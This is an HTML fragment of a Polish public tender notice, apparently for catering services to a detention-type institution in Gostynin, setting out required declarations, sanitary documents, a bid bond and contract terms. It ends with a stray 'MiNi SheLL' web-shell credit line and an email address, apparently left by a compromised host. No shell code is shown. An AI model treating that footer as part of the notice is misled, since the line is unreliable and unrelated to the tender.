mowa<br/>w art. 125 ust. 1 Ustawy Pzp, także oświadczenie Podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia<br/>tego Podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, Zamawiający żąda od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania Wykonawcy.<br/>3. Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 Ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu Ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2021r., poz. 275), z innym Wykonawcą,<br/>który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej.<br/>4. Odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt. 4 Ustawy Prawo zamówień publicznych lub art. 7 ust. 1 Ustawy o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, sporządzonych nie wcześniej<br/>niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>5. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu<br/>do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznej Podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>Wykonawca, który polega na zdolnościach lub sytuacji Podmiotów udostępniających zasoby, musi udowodnić Zamawiającemu, że<br/>realizując zamówienie będzie dysponował niezbędnymi zasobami tych Podmiotów poprzez złożenie wraz z ofertą zobowiązania<br/>Podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia<br/>lub złożyć inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienie dołączają do oferty oświadczenie, z którego wynika, które usługi<br/>wykonają poszczególni Wykonawcy.<br/>3. Wykonawca przedstawi decyzję/opinię/zaświadczenie Sanepidu zezwalające na przygotowywanie posiłków w żywieniu<br/>zbiorowym oraz dokument z ostatniej kontroli sanitarnej przeprowadzonej przez odpowiednią Stację Sanitarno-Epidemiologiczną,<br/>sprawującą bieżący nadzór nad kuchnią – dokument z kontroli przeprowadzonej w roku 2022, w przypadku, gdy ostatnia kontrola<br/>odbyła się wcześniej, Wykonawca do złożonego dokumentu z tej kontroli zobowiązany będzie dołączyć stosowne oświadczenie.<br/>4. Wykonawca przedstawi decyzję/opinię/zaświadczenie Sanepidu z ostatniej kontroli sanitarnej przeprowadzonej przez<br/>odpowiednią Stację Sanitarno-Epidemiologiczną, sprawującą bieżący nadzór nad środkiem transportu – dokument z kontroli<br/>przeprowadzonej w roku 2022, w przypadku, gdy ostatnia kontrola odbyła się wcześniej, Wykonawca do złożonego protokołu z tej<br/>kontroli zobowiązany będzie dołączyć stosowne oświadczenie.<br/>- dokumenty, o których mowa w pkt. 3) i 4) potwierdzać mają przygotowywanie oraz przewóz żywności przy zachowaniu warunków<br/>gwarantujących jej bezpieczeństwo, zgodnie z obowiązującymi w tym zakresie przepisami prawa. Wykonawca przedkładając<br/>wymagane dokumenty powinien potwierdzić spełnienie warunków dla kuchni i środka transportu związanych bezpośrednio z<br/>realizacją zamówienia objętego postępowaniem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty Wykonawca dołącza formularz ofertowy z wykorzystaniem wzoru wraz z załącznikiem w postaci wykazu<br/>wartości poszczególnych posiłków składających się na jeden osobodzień żywienia.<br/>2. Wykonawca dołącza do oferty potwierdzenie wniesienia przez Wykonawcę wadium na warunkach określonych w punkcie<br/>XXVIII SWZ.<br/>3. W celu potwierdzenia akceptacji przez Wykonawcę warunków realizacji zamówienia zawartych we wzorze umowy,<br/>Wykonawca załączy do oferty parafowane przez Wykonawcę projektowane postanowienia umowy.<br/>4. Do oferty Wykonawca dołączy oświadczenia i/lub dokumenty, na podstawie których Zamawiający dokona oceny<br/>skuteczności zastrzeżenia informacji zawartych w ofercie, stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów<br/>o zwalczaniu nieuczciwej konkurencji – jeżeli Wykonawca dokonuje zastrzeżenia takich informacji – wskazane jest<br/>wyodrębnienie wskazanych dokumentów, tj. Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w<br/>wydzielonym i odpowiednio oznaczonym pliku. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do postępowania Wykonawca zobowiązany jest do wniesienia wadium w wysokości 8.000,00 złotych<br/>(słownie: osiem tysięcy złotych 00/100).<br/>2. Wadium wnosi się przed upływem terminu składania ofert i za wyjątkami przewidzianymi w Ustawie Pzp utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą.<br/>3. Wadium należy wnieść w jednej z form wskazanej w art. 97 ust. 7 Ustawy Pzp.<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto Krajowego Ośrodka Zapobiegania Zachowaniom<br/>Dyssocjalnym w Gostyninie<br/>87 1020 3974 0000 5202 0273 2485.<br/>- za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie gwarancji lub poręczenia musi być złożone jako oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>Ustawie Pzp,<br/>2) z ich treści powinno jednoznacznie wynikać zobowiązanie Gwaranta do zapłaty całej kwoty wadium,<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż<br/>pierwszym dniem terminu związania ofertą jest dzień, w którym upływa termin składania ofert),<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>6) Beneficjentem poręczenia lub gwarancji jest Krajowy Ośrodek Zapobiegania Zachowaniom Dyssocjalnym w Gostyninie.<br/>7) w przypadku Wykonawców wspólnie ubiegających się o zamówienie, Zamawiający wymaga, aby poręczenie lub<br/>gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o zamówienie lub aby z jej treści<br/>wynikało, że wadium zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>6. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie, do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt. 3 Ustawy Pzp, zostanie odrzucona.<br/>7. Zwrot oraz utrata wadium następuje zgodnie z art. 98 Ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>- Pełnomocnictwo powinno być załączone do oferty jako dokument<br/>w postaci elektronicznej składany pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym przez osobę/osoby uprawnione.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z Podmiotem występującym jako pełnomocnik Wykonawców<br/>wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>3. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie<br/>przed zawarciem umowy w sprawie zamówienia publicznego żądać kopii umowy regulującej współpracę tych Wykonawców,<br/>na warunkach określonych w<br/>pkt. XIX ust. 5 SWZ.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ust. 1<br/>Ustawy Pzp, składa każdy z Wykonawców – oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>6. Pozostałe oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7. Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu składa każdy z Wykonawców w<br/>zakresie, w jakim wykazuje spełnianie tych warunków.<br/>8. W przypadku Wykonawców wspólnie ubiegających się o zamówienie warunki udziału w postępowaniu zostaną spełnione,<br/>jeżeli chociaż jeden<br/>z Wykonawców spełnia warunek samodzielnie lub warunek ten został spełniony przez podmioty łącznie.<br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane.<br/>10. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>usługi wykonają poszczególni Wykonawcy.<br/>11. Wykonawcy wspólnie ubiegający się o zamówienie ponoszą solidarną odpowiedzialność za wykonanie umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony przewidują możliwość dokonywania zmian w umowie. Zmiana umowy dopuszczalna będzie w granicach<br/>wyznaczonych przepisami Ustawy Prawo zamówień publicznych. Jednakże strony są uprawnione do wprowadzenia do<br/>umowy zmian nieistotnych tj. innych niż wymienione<br/>w art. 454 ust. 2 Ustawy Prawo zamówień publicznych.<br/>- istotna zmiana zawartej umowy wymaga przeprowadzenia nowego postępowania o zamówienie.<br/>2. Strona wnioskująca o zmianę umowy złoży odpowiedni wniosek drugiej stronie.<br/>3. Złożenie wniosku, o którym mowa w ust. 2 powyżej stanowi warunek umożliwiający podjęcie procedury zmiany umowy.<br/>4. Zmiana umowy może nastąpić w przypadku zaistnienia następujących okoliczności:<br/>- siły wyższej, o której mowa § 25 ust. 5 projektowanych postanowień umowy,<br/>- zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację usługi lub świadczenia<br/>stron,<br/>- zmiany urzędowej stawki podatku VAT,<br/>- powstania rozbieżności lub niejasności w rozumieniu pojęć użytych<br/>w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i<br/>doprecyzowanie umowy w celu jednoznacznej interpretacji jej postanowień przez strony.<br/>5. Ustala się, iż nie stanowi istotnej zmiany umowy w rozumieniu<br/>art. 454 Ustawy Prawo zamówień publicznych, w szczególności:<br/>- zmiana numeru rachunku bankowego Wykonawcy,<br/>- zmiana osób wskazanych do kontaktów między stronami,<br/>- zmiana danych teleadresowych.<br/>6. Zmiany treści umowy mogą być dokonane również w przypadku zaistnienia okoliczności wskazanych w art. 455 ust. 1<br/>pkt. 2-4 i ust. 2 Ustawy Prawo zamówień publicznych.<br/>7. Wszelkie zmiany postanowień umownych winny być dokonywane, pod rygorem nieważności wyłącznie w formie pisemnej<br/>– na warunkach określonych w paragrafie 29 projektowanych postanowień umowy, przy czym w razie wątpliwości przyjmuje<br/>się, że formy pisemnej nie wymagają zmiany określone w ust. 5 wskazanego paragrafu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi załącznikami należy złożyć za pośrednictwem Platformy przetargowej Zamawiającego dostępnej pod adresem: https://kozzd-gostynin.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-16</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający zastrzega sobie prawo do skierowania zaproszenia do maksymalnie 3 Wykonawców, których oferty spełniają<br/>w najwyższym stopniu jedno kryterium oceny ofert określone w SWZ, jakim jest cena, spośród ofert niepodlegających<br/>odrzuceniu. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania wyklucza się Wykonawców, którzy podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1<br/>Ustawy z dnia 11.09.2019r. Prawo zamówień publicznych oraz Wykonawców co do których zachodzą przesłanki<br/>wykluczenia na podstawie art. 7 ust. 1 Ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com